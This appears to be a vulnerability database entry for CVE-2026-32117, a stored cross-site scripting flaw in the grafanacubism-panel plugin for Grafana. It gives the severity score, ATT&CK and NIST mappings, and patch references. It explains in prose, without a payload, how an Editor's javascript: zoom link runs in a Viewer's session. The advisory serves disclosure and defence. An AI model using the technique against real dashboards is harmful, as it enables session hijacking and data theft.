CVE-2026-32117
Published: 11 March 2026
Summary
CVE-2026-32117 is a high-severity Cross-site Scripting (CWE-79) vulnerability in Ekacnet Grafanacubism-Panel. Its CVSS base score is 7.6 (High).
Operationally, exploitation aligns with the MITRE ATT&CK technique Browser Session Hijacking (T1185); ranked at the 3.8th percentile by exploit likelihood (below the median); it is not currently listed in the CISA KEV catalog.
The strongest mitigations our analysis identified are NIST 800-53 SI-10 (Information Input Validation) and SI-2 (Flaw Remediation).
Deeper analysis
CVE-2026-32117 is a cross-site scripting (XSS) vulnerability, classified under CWE-79, in the grafanacubism-panel plugin for Grafana. Versions 0.1.2 and earlier allow use of cubism.js in panels, but the zoom-link handler passes a dashboard-editor-supplied URL directly to window.location.assign() or window.open() without any scheme validation. Published on 2026-03-11, it carries a CVSS v3.1 base score of 7.6 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:L/A:N), indicating network accessibility, low attack complexity, and potential for high confidentiality impact in a changed scope.
An attacker requires dashboard Editor privileges to exploit the issue by configuring the panel's zoom link as a javascript: URI containing a malicious payload. Exploitation occurs when any Viewer with access to the dashboard performs a drag-zoom interaction on the affected panel, triggering the payload to execute within the Grafana origin. This enables theft of sensitive data visible to the victim, such as session tokens or dashboard contents, due to the origin's trust context.
Mitigation details are provided in the plugin's GitHub security advisory (GHSA-q6fh-6m3m-5948) and the fixing commit (b79cbf7e5eb3225bb204bcef274e15e6b19d9926). Security practitioners should update the grafanacubism-panel plugin beyond version 0.1.2, verify dashboard configurations to remove malicious links, and restrict Editor privileges where possible to prevent setup of exploitable panels.
EU & UK References
- 🇪🇺 ENISA EUVD: EUVD-2026-11407
Vulnerability details
The grafanacubism-panel plugin allows use of cubism.js in Grafana. In 0.1.2 and earlier, the panel's zoom-link handler passes a dashboard-editor-supplied URL directly to window.location.assign() / window.open() with no scheme validation. An attacker with dashboard Editor privileges can set the link…
more
to a javascript: URI; when any Viewer drag-zooms on the panel, the payload executes in the Grafana origin.
- CWE(s)
Related Threats
MITRE ATT&CK Enterprise TechniquesAI
Why these techniques?
Stored XSS in Grafana web panel directly enables browser session hijacking (T1185) via javascript: URI execution and theft/use of web session cookies (T1539, T1550.004) for data exfiltration or impersonation.
CVEs Like This One
Affected Assets
Mitigating Controls
Mitigating Controls (NIST 800-53 r5) AI
Directly mitigates the CVE by requiring timely patching of the vulnerable grafanacubism-panel plugin beyond version 0.1.2, which adds scheme validation to the zoom-link handler.
Enforces validation of dashboard-editor-supplied URLs in the zoom-link handler to block javascript: URIs before they reach window.location.assign() or window.open().
Limits dashboard Editor privileges to trusted users only, reducing the attack surface for configuring malicious zoom links exploitable by Viewers.